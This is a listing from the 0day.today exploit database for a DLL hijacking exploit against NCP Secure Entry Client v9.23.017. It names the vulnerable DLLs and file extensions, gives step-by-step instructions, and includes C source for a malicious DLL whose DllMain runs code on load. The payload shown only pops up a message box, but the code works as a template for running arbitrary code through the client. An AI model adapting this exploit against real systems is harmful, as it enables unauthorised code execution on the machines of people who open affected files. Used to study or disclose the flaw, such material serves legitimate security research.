[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NCP Secure Entry Client v.9.23.017 DLL Hijacking Exploit

Author
secuid0
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14075
Category
local exploits
Date add
14-09-2010
Platform
windows
========================================================
NCP Secure Entry Client v.9.23.017 DLL Hijacking Exploit 
========================================================

/*
Exploit Title: NCP Secure Entry Client v.9.23.017 DLL Hijacking Exploit (conman.dll, dvccsabase002.dll, kmpapi32.dll, ncpmon2.dll)
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Software Version: NCP Secure Entry Client v.9.23.017
Vendor Site: http://www.ncp-e.com/
Download URL: http://www.ncp-e.com/en/downloadstatistik/secure-entry-client/ncp-secure-entry-client-released.html
Vulnerable Extensions: pcf, spd, wge, wgx
Tested Under: winxp_sp3.080413-2111

Instructions: 
1. Compile the following code
2. Create a file of the affected extensions in the same directory as the dll
3. Execute file.<extension>
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

int m0nk()
{
	MessageBox(0, "NCP Secure Entry Client v9.23.017 is vulnerable to DLL Hijacking", "secuid0", MB_OK);
	return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD m0nk_call,LPVOID lpReserved)
{
	switch (m0nk_call)
	{
	case DLL_PROCESS_ATTACH:
		m0nk();
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}



#  0day.today [2024-12-24]  #